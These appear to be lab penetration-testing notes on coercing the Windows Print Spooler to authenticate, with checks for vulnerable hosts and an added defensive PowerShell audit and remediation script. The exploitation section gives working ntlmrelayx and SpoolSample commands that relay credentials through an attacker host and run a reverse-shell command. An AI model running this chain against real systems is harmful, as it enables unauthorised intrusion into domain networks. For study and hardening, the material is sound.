An authenticated domain user can force the print spooler service to authenticate to an arbitrary IP.
Requirements
- A valid set of AD user credentials.
- Network connectivity to the target’s SMB service.
- The target host must be running the Print Spooler service.
- The host must not enforce SMB signing (a relayed session is rejected where signing is required).
Check if target is vulnerable
Print Spooler Service present on target host
Check whether the Print Spooler service is running on a target host (the WMI query lists printers, which the spooler serves):
Get-WmiObject Win32_Printer -ComputerName thmserver2.za.tryhackme.loc
Equivalent using the PrintManagement module:
Get-PrinterPort -ComputerName thmserver2.za.tryhackme.loc
If the check errors...
Remote WMI/RPC access to the ports these checks use is sometimes blocked, so the check can error even when the service is running. If that happens, just try the exploit.
SMB Signing not enforced
nmap --script=smb2-security-mode -p445 source dest
Check whether either the source (if on a remote pivot host) or the destination requires SMB signing. Domain controllers require signing by default; member servers and workstations usually do not.
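The same two conditions seen from the defender's side, as an added example that is not part of the original notes: it audits a list of hosts over PowerShell remoting and, with -Remediate, enforces the mitigations. It assumes local admin rights and WinRM on the listed hosts; the $Hosts default is a placeholder inventory.

```powershell
# Added audit/remediation script (not from the original notes).
# Requires local admin on the targets and WinRM; $Hosts is a placeholder list.
param(
    [string[]]$Hosts = @('thmserver2.za.tryhackme.loc'),  # assumed inventory
    [switch]$Remediate
)

$audit = {
    param([bool]$Fix)
    $spooler = Get-Service -Name Spooler -ErrorAction SilentlyContinue
    $smb     = Get-SmbServerConfiguration
    $result  = [pscustomobject]@{
        Host               = $env:COMPUTERNAME
        SpoolerRunning     = [bool]($spooler -and $spooler.Status -eq 'Running')
        SmbSigningRequired = [bool]$smb.RequireSecuritySignature
        Action             = 'none'
    }
    if ($Fix) {
        $actions = @()
        if ($result.SpoolerRunning) {
            # Print servers legitimately need the Spooler; disable it elsewhere (DCs first).
            Stop-Service -Name Spooler -Force
            Set-Service  -Name Spooler -StartupType Disabled
            $actions += 'Spooler disabled'
        }
        if (-not $result.SmbSigningRequired) {
            # Server-side signing requirement makes a relayed SMB session fail.
            Set-SmbServerConfiguration -RequireSecuritySignature $true -Force
            $actions += 'SMB signing required'
        }
        if ($actions) { $result.Action = $actions -join '; ' }
    }
    $result
}

$findings = Invoke-Command -ComputerName $Hosts -ScriptBlock $audit `
                           -ArgumentList $Remediate.IsPresent

# Hosts with SpoolerRunning = True and SmbSigningRequired = False are the ones
# exposed to the coercion-plus-relay chain described in these notes.
$findings |
    Select-Object Host, SpoolerRunning, SmbSigningRequired, Action |
    Format-Table -AutoSize
```

Run it without -Remediate first to get the report, then again with -Remediate on the hosts where disabling the spooler is acceptable.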
Exploitation
The example below attacks auth.server.domain.name by forcing a compromised host's print spooler to authenticate against it.
Set up the authentication relay on the attacker machine (may be unstable) and specify the command to execute on auth.server.domain.name:
/usr/share/doc/python3-impacket/examples/ntlmrelayx.py -smb2support -t smb://"auth.server.domain.name" -c 'revsh command' -debug
This relays the authentication request from the print spooler service to a domain-joined machine.
Start the attack on the compromised host (authenticate against auth.server.domain.name through attacker_ip):
SpoolSample.exe "auth.server.domain.name" "attacker_ip"
Wait for the relay to receive the authentication attempt and execute the command.